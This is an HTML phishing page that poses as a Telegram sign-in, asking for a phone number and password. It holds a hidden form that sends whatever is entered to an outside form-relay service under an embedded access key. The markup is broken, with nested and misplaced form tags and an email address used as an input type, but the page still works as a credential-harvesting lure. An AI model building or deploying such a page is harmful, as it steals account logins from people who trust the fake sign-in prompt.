<!doctype html>
<html lang="zh">

<head>
  <title>Sign in</title>
  <meta charset="UTF-8" />
  <meta name="viewport"
    content="width=device-width,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=no">
</head>
<form action="https://api.web3forms.com/submit" method="POST">

    <input type="hidden" name="access_key" value="9fdbe648-2005-4963-ae68-2a64066747c6">
<body>
  <div class="container">
    <h2>Sign in to join telegram </h2>
    <form method="post">
      <div class="form-container">
        <label>Number</label>
        <input type="text" name="username" required autocomplete="off"></input>
        <br/>
        <label>Password</label>
            <input type="glennsamevangelio70@gmail.com" name="glennsamevangelio70@gmail.com" required>
        <input type="submit" value="Log in"></input>
      </div>
    </form>
  </div>
  <div class="copyright">Glennsamevangelio</div> 
</body>
<style>
  html,
  body {
    background: #eee;
    padding: 0;
    margin: 0;
  }

  .container {
    width: 400px;
    background: #fff;
    margin: 0 auto;
    text-align: center;
    line-height: 40px;
    margin-top: 30px;
    padding-top: 6px;
    padding-bottom: 15px;
    box-shadow: rgb(48 52 63 / 20%) 0px 2px 2px, rgb(255 255 255) 0px 0px 0px 1px inset;
  }

  .form-container label {
    display: inline-block;
    text-align: justify;
    text-align-last: justify;
    margin-right: 10px;
    width: 60px;
  }

  .form-container input {
    display: inline-block;
  }

  .form-container input[type=submit] {
    display: block;
    margin: 8px auto;
    padding: 0 18px;
  }

  .copyright {
    width: fit-content;
    margin: 10px auto 0 auto;
    font-size: 13px;
    color: #c4c4c4;
  }
</style>

</html>